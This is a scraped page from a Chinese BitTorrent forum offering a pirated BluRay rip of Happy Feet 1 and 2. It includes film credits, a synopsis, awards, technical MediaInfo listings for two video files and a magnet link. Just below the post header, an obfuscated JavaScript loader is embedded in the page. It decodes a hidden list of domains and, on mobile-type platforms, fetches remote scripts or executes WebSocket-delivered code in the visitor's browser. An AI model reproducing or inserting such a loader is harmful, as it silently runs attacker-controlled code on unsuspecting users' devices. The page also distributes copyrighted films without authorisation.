快乐的大脚[快乐的大脚1-2合集[国粤英音轨/简繁英字幕].Happy.Feet.1-2.2006-2011.BluRay.1080p.迅雷下载 18.06GB

版主小s 1月前 163

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 快乐的大脚 / 踢跶小企鹅(港) / 欢快的大脚 / 欢乐大脚 / 快乐脚

◎片 名 Happy Feet

◎年 代 2006

◎产 地 澳大利亚 / 美国

◎类 别 喜剧 / 爱情 / 动画 / 音乐 / 家庭 / 冒险

◎语 言 英语

◎上映日期 2006-11-17(美国)

◎IMDb链接 https://www.imdb.com/title/tt0366548/

◎豆瓣评分 7.4/10 (75445人评价)

◎豆瓣链接 https://movie.douban.com/subject/1760027/

◎片 长 108 分钟

◎导 演 乔治·米勒 George Miller (id:1056046)

沃伦·科尔曼 Warren Coleman (id:1281033)

朱迪·莫里斯 Judy Morris (id:1292549)

◎编 剧 沃伦·科尔曼 Warren Coleman (id:1281033)

约翰·科里 John Collee (id:1281051)

乔治·米勒 George Miller (id:1056046)

朱迪·莫里斯 Judy Morris (id:1292549)

◎演 员 伊利亚·伍德 Elijah Wood (id:1054395)

布莱特妮·墨菲 Brittany Murphy (id:1035650)

休·杰克曼 Hugh Jackman (id:1010508)

妮可·基德曼 Nicole Kidman (id:1054442)

罗宾·威廉姆斯 Robin Williams (id:1009241)

雨果·维文 Hugo Weaving (id:1040994)

拉里·莫斯 Larry Moss (id:1292607)

彼得·卡罗尔 Peter Carroll (id:1280161)

John DeVito John DeVito (id:1235186)

杰弗里·加西亚 Jeffrey Garcia (id:1284498)

沃伦·科尔曼 Warren Coleman (id:1281033)

Efrain Figueroa Efrain Figueroa (id:1283697)

姜广涛 Guangtao Jiang (id:1317670)

道格·米切尔 Doug Mitchell (id:1292226)

乔治·米勒 George Miller (id:1056046)

朱迪·莫里斯 Judy Morris (id:1292549)

比尔·米勒 Bill Miller (id:1292071)

埃德·琼斯 Ed Jones (id:1287861)

沃伦·科尔曼 Warren Coleman (id:1281033)

约翰·鲍威尔 John Powell (id:1050025)

Jean-Pascal Leblanc Jean-Pascal Leblanc (id:1305381)

莱斯利·范德沃尔特 Lesley Vanderwalt (id:1299835)

丹尼尔·简尼特 Daniel Jeannette (id:1287643)

Jeremy Howdin Jeremy Howdin (id:1304658)

Matt Logue Matt Logue (id:1290239)

Darren Byford Darren Byford (id:1301867)

Greg Gladstone Greg Gladstone (id:1305203)

Enrique Vila Enrique Vila (id:1300057)

Jean-Pascal Leblanc Jean-Pascal Leblanc (id:1305381)

Carl Prud'homme Carl Prud'homme (id:1305389)

Tim Gibson Tim Gibson (id:1311038)

Yvonne Muinde Yvonne Muinde (id:1309706)

Damien Gray Damien Gray (id:1308293)

格登·特鲁布拉德 Guerdon Trueblood (id:1299555)

Daniel Macarin Daniel Macarin (id:1308091)

John Vegher John Vegher (id:1307805)

Tania Richard Tania Richard (id:1305650)

马克·安德烈·萨姆森 Marc-Andre Samson (id:1296592)

◎标 签 动画 / 美国 / 企鹅 / 动画片 / 美国电影 / 搞笑 / 2006 / 卡通

◎简 介

玛宝是帝企鹅家族中的另类分子,经常受到排挤歧视——原因是在帝企鹅里面,不会唱歌是一件丢人的事情,而玛宝恰恰是这样的企鹅。但是,他格外擅长舞蹈,舞技超群的绝艺却没有带给他幸运,铁面领袖把他赶出了族门。

玛宝在外面的世界流浪,却碰上了另一个族群:阿德利企鹅。这群企鹅嗜好跳舞,自诩“2266歌舞团”,他们惊叹于玛宝的舞步,邀请他前去舞会狂欢。然而,在前往舞会的路上,玛宝遇到了一个踩着摇滚舞步的流浪者,他指引玛宝去解开心中的谜团:为什么企鹅食物会越来越少,为什么海平面有大型的铁皮船,为什么船上的人对企鹅残暴不仁。于是玛宝追踪一艘铁壳船,闯入了人类的世界。

◎获奖情况 (共6项)

第79届奥斯卡金像奖 (2007)

最佳动画长片

└──乔治·米勒 (id:1056046)

第64届金球奖 (2007)

电影类 最佳动画长片(提名)

电影类 最佳原创歌曲

└──王子 (id:1055670)

第34届动画安妮奖 (2007)

最佳动画长片(提名)

最佳编剧(提名)

└──沃伦·科尔曼 (id:1281033)

└──约翰·科里 (id:1281051)

└──朱迪·莫里斯 (id:1292549)

└──乔治·米勒 (id:1056046)

第7届美国电影学会奖 (2006)

年度佳片

  1. General

  2. Unique ID : 109176617279232813940437730639811082596 (0x5222A6D22C7F43C558470EC0428E7964)

  3. Complete name : Happy.Feet.2006.BluRay.1080p.MultiAudio.TrueHD.5.1.x265.10bit-BeiTai.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.10 GiB

  7. Duration : 1 h 48 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 10.7 Mb/s

  10. Encoded date : UTC 2021-06-28 13:37:17

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 48 min

  20. Bit rate : 6 461 kb/s

  21. Width : 1 920 pixels

  22. Height : 796 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.176

  30. Stream size : 4.90 GiB (61%)

  31. Title : HEVC, [email protected]@High, 24/1.001 fps @ 6461 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x796 / interlace=0 / total-frames=156137 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio #1

  42. ID : 2

  43. Format : MLP FBA

  44. Format/Info : Meridian Lossless Packing FBA

  45. Commercial name : Dolby TrueHD

  46. Codec ID : A_TRUEHD

  47. Duration : 1 h 48 min

  48. Bit rate mode : Variable

  49. Bit rate : 1 868 kb/s

  50. Maximum bit rate : 3 291 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 1 200.000 FPS (40 SPF)

  55. Compression mode : Lossless

  56. Stream size : 1.42 GiB (17%)

  57. Title : English Dolby TrueHD 5.1 @ 3291 Kbps

  58. Language : English

  59. Default : Yes

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : AC-3

  64. Format/Info : Audio Coding 3

  65. Commercial name : Dolby Digital

  66. Codec ID : A_AC3

  67. Duration : 1 h 48 min

  68. Bit rate mode : Constant

  69. Bit rate : 640 kb/s

  70. Channel(s) : 6 channels

  71. Channel layout : L R C LFE Ls Rs

  72. Sampling rate : 48.0 kHz

  73. Frame rate : 31.250 FPS (1536 SPF)

  74. Compression mode : Lossy

  75. Stream size : 497 MiB (6%)

  76. Title : English Dolby Digital Audio 5.1 @ 640 kbps

  77. Language : English

  78. Service kind : Complete Main

  79. Default : No

  80. Forced : No


  81. Audio #3

  82. ID : 4

  83. Format : AC-3

  84. Format/Info : Audio Coding 3

  85. Commercial name : Dolby Digital

  86. Codec ID : A_AC3

  87. Duration : 1 h 48 min

  88. Bit rate mode : Constant

  89. Bit rate : 384 kb/s

  90. Channel(s) : 6 channels

  91. Channel layout : L R C LFE Ls Rs

  92. Sampling rate : 48.0 kHz

  93. Frame rate : 31.250 FPS (1536 SPF)

  94. Compression mode : Lossy

  95. Stream size : 298 MiB (4%)

  96. Title : Mandarin Dolby Digital Audio 5.1 @ 384 kbps 国语

  97. Language : Chinese

  98. Service kind : Complete Main

  99. Default : No

  100. Forced : No


  101. Audio #4

  102. ID : 5

  103. Format : AC-3

  104. Format/Info : Audio Coding 3

  105. Commercial name : Dolby Digital

  106. Codec ID : A_AC3

  107. Duration : 1 h 48 min

  108. Bit rate mode : Constant

  109. Bit rate : 448 kb/s

  110. Channel(s) : 2 channels

  111. Channel layout : L R

  112. Sampling rate : 48.0 kHz

  113. Frame rate : 31.250 FPS (1536 SPF)

  114. Compression mode : Lossy

  115. Stream size : 348 MiB (4%)

  116. Title : Mandarin Dolby Digital Audio 2.0 @ 448 kbps 国语

  117. Language : Chinese

  118. Service kind : Complete Main

  119. Default : No

  120. Forced : No


  121. Audio #5

  122. ID : 6

  123. Format : AC-3

  124. Format/Info : Audio Coding 3

  125. Commercial name : Dolby Digital

  126. Codec ID : A_AC3

  127. Duration : 1 h 48 min

  128. Bit rate mode : Constant

  129. Bit rate : 384 kb/s

  130. Channel(s) : 6 channels

  131. Channel layout : L R C LFE Ls Rs

  132. Sampling rate : 48.0 kHz

  133. Frame rate : 31.250 FPS (1536 SPF)

  134. Compression mode : Lossy

  135. Stream size : 298 MiB (4%)

  136. Title : Cantonese Dolby Digital Audio 5.1 @ 384 kbps 粤语

  137. Language : Chinese

  138. Service kind : Complete Main

  139. Default : No

  140. Forced : No


  141. Audio #6

  142. ID : 7

  143. Format : AC-3

  144. Format/Info : Audio Coding 3

  145. Commercial name : Dolby Digital

  146. Codec ID : A_AC3

  147. Duration : 1 h 48 min

  148. Bit rate mode : Constant

  149. Bit rate : 384 kb/s

  150. Channel(s) : 6 channels

  151. Channel layout : L R C LFE Ls Rs

  152. Sampling rate : 48.0 kHz

  153. Frame rate : 31.250 FPS (1536 SPF)

  154. Compression mode : Lossy

  155. Stream size : 298 MiB (4%)

  156. Title : Mandarin Dolby Digital Audio 5.1 @ 384 kbps 台配国语

  157. Language : Chinese

  158. Service kind : Complete Main

  159. Default : No

  160. Forced : No


  161. Text #1

  162. ID : 8

  163. Format : PGS

  164. Codec ID : S_HDMV/PGS

  165. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  166. Duration : 1 h 47 min

  167. Bit rate : 20.0 kb/s

  168. Count of elements : 2648

  169. Stream size : 15.4 MiB (0%)

  170. Title : Chs/SUP 简体

  171. Language : Chinese

  172. Default : Yes

  173. Forced : No


  174. Text #2

  175. ID : 9

  176. Format : PGS

  177. Codec ID : S_HDMV/PGS

  178. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  179. Duration : 1 h 47 min

  180. Bit rate : 20.6 kb/s

  181. Count of elements : 2648

  182. Stream size : 15.9 MiB (0%)

  183. Title : Cht/SUP 繁体

  184. Language : English

  185. Default : No

  186. Forced : No




复制代码

  1. General

  2. Unique ID : 123492301108566049243723453822941539561 (0x5CE7C0870B969A6B798D383BD6602CE9)

  3. Complete name : Happy.Feet.2.2011.BluRay.1080p.3Audio.DTS-HD.MA.5.1.x265.10bit-BeiTai.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.96 GiB

  7. Duration : 1 h 39 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 14.3 Mb/s

  10. Encoded date : UTC 2021-06-28 13:38:54

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 39 min

  20. Bit rate : 10.6 Mb/s

  21. Width : 1 920 pixels

  22. Height : 816 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.283

  30. Stream size : 7.38 GiB (74%)

  31. Title : HEVC, [email protected]@High, 24/1.001 fps @ 10698 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / total-frames=143137 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio #1

  42. ID : 2

  43. Format : DTS XLL

  44. Format/Info : Digital Theater Systems

  45. Commercial name : DTS-HD Master Audio

  46. Codec ID : A_DTS

  47. Duration : 1 h 39 min

  48. Bit rate mode : Variable

  49. Bit rate : 2 310 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 16 bits

  55. Compression mode : Lossless

  56. Stream size : 1.61 GiB (16%)

  57. Title : English DTS-HD Master Audio 5.1 @ 2311 kbps

  58. Language : English

  59. Default : Yes

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : AC-3

  64. Format/Info : Audio Coding 3

  65. Commercial name : Dolby Digital

  66. Codec ID : A_AC3

  67. Duration : 1 h 39 min

  68. Bit rate mode : Constant

  69. Bit rate : 640 kb/s

  70. Channel(s) : 6 channels

  71. Channel layout : L R C LFE Ls Rs

  72. Sampling rate : 48.0 kHz

  73. Frame rate : 31.250 FPS (1536 SPF)

  74. Compression mode : Lossy

  75. Stream size : 456 MiB (4%)

  76. Title : Mandarin Dolby Digital Audio 5.1 @ 640 kbps 国语

  77. Language : Chinese

  78. Service kind : Complete Main

  79. Default : No

  80. Forced : No


  81. Audio #3

  82. ID : 4

  83. Format : AC-3

  84. Format/Info : Audio Coding 3

  85. Commercial name : Dolby Digital

  86. Codec ID : A_AC3

  87. Duration : 1 h 39 min

  88. Bit rate mode : Constant

  89. Bit rate : 640 kb/s

  90. Channel(s) : 6 channels

  91. Channel layout : L R C LFE Ls Rs

  92. Sampling rate : 48.0 kHz

  93. Frame rate : 31.250 FPS (1536 SPF)

  94. Compression mode : Lossy

  95. Stream size : 456 MiB (4%)

  96. Title : Cantonese Dolby Digital Audio 5.1 @ 640 kbps 粤语

  97. Language : Chinese

  98. Service kind : Complete Main

  99. Default : No

  100. Forced : No


  101. Text #1

  102. ID : 5

  103. Format : PGS

  104. Codec ID : S_HDMV/PGS

  105. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  106. Duration : 1 h 38 min

  107. Bit rate : 36.7 kb/s

  108. Count of elements : 3530

  109. Stream size : 25.9 MiB (0%)

  110. Title : Eng/SUP

  111. Language : English

  112. Default : No

  113. Forced : No


  114. Text #2

  115. ID : 6

  116. Format : PGS

  117. Codec ID : S_HDMV/PGS

  118. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  119. Duration : 1 h 38 min

  120. Bit rate : 23.9 kb/s

  121. Count of elements : 2504

  122. Stream size : 16.9 MiB (0%)

  123. Title : Chs/SUP 原盘简体

  124. Language : Chinese

  125. Default : Yes

  126. Forced : No


  127. Text #3

  128. ID : 7

  129. Format : PGS

  130. Codec ID : S_HDMV/PGS

  131. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  132. Duration : 1 h 38 min

  133. Bit rate : 27.3 kb/s

  134. Count of elements : 3056

  135. Stream size : 19.3 MiB (0%)

  136. Title : Cht/SUP 原盘繁体(TW)

  137. Language : Chinese

  138. Default : No

  139. Forced : No


  140. Text #4

  141. ID : 8

  142. Format : PGS

  143. Codec ID : S_HDMV/PGS

  144. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  145. Duration : 1 h 38 min

  146. Bit rate : 23.5 kb/s

  147. Count of elements : 2954

  148. Stream size : 16.6 MiB (0%)

  149. Title : Cht/SUP 原盘繁体(HK)

  150. Language : Chinese

  151. Default : No

  152. Forced : No


  153. Menu

  154. 00:00:00.000 : en:第 01 章

  155. 00:11:01.578 : en:第 02 章

  156. 00:19:03.184 : en:第 03 章

  157. 00:29:16.755 : en:第 04 章

  158. 00:39:12.350 : en:第 05 章

  159. 00:49:39.727 : en:第 06 章

  160. 00:58:26.461 : en:第 07 章

  161. 01:09:52.105 : en:第 08 章

  162. 01:19:59.920 : en:第 09 章

  163. 01:30:29.924 : en:第 10 章


TAGS 冒险 动画 喜剧 爱情 家庭 音乐

磁力链:
  • magnet:?xt=urn:btih:42EC459A372F3567C5125E57C20AA552342B2C17

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回